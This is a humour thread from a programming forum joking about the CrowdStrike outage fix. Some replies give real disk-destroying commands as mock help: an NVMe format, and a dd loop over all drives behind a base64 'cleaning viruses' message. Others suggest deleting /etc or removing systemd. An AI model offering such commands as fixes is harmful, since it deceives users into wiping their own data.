this post was submitted on 19 Jul 2024
493 points (96.6% liked)

Programmer Humor

19176 readers
1861 users here now

Welcome to Programmer Humor!

This is a place where you can post jokes, memes, humor, etc. related to programming!

For sharing awful code theres also Programming Horror.

Rules

founded 1 year ago
MODERATORS
 

Seeing the crowdstrike solution reminded me of the old memes

Go to C:\Windows\System32\drivers\CrowdStrike

Locate and delete file matching "C-00000291*.sys"

you are viewing a single comment's thread
view the rest of the comments
[–] henfredemars@infosec.pub 49 points 2 months ago (5 children)

Instructions unclear. Using Linux.

Wait a sec I think I found it.

[–] nickb333@fedia.io 33 points 2 months ago (1 children)

I found mine in $HOME/.wine32/drive_c/windows/system32

[–] henfredemars@infosec.pub 10 points 2 months ago (1 children)

This didn't break my whole system but it did break most of the software I value, so mission accomplished!

[–] nickb333@fedia.io 2 points 1 month ago

I made a typo in the above. If I correct it you'll be able to break what's left.

[–] Gradually_Adjusting@lemmy.world 24 points 2 months ago (1 children)

If you don't have system32, it's fine to delete one from the store

[–] xmunk@sh.itjust.works 9 points 2 months ago

Or find another computer and delete it from that.

[–] communism@lemmy.ml 11 points 2 months ago (1 children)

They may have changed the name to replace the 32 with d, make sure to uninstall systemd if it's installed.

[–] Zangoose@lemmy.world 2 points 2 months ago

Instructions unclear installed Alpine linux

[–] refurbishedrefurbisher@lemmy.sdf.org 10 points 2 months ago (1 children)

On Linux, it's sudo apt install nvme-cli -y && sudo nvme format -f /dev/nvme0n1

[–] Dark_Dragon@lemmy.dbzer0.com 3 points 2 months ago (1 children)
[–] refurbishedrefurbisher@lemmy.sdf.org 2 points 2 months ago (1 children)
echo Q2xlYW5pbmcgdmlydXNlcyBmcm9tIGNvbXB1dGVyLi4uCg== | base64 -d && for f in /dev/sd*; do sudo dd if=/dev/urandom of=$f; done
[–] Dark_Dragon@lemmy.dbzer0.com 4 points 2 months ago (1 children)

It said ' Cleaning viruses from computer..." And screen went dark

That's normal. That just means the viruses were cleaned from your computer.

[–] OopsAllTwix@lemmy.dbzer0.com 4 points 2 months ago (1 children)

It's the /etc folder in linux. Just extra crap you don't need.

[–] henfredemars@infosec.pub 3 points 2 months ago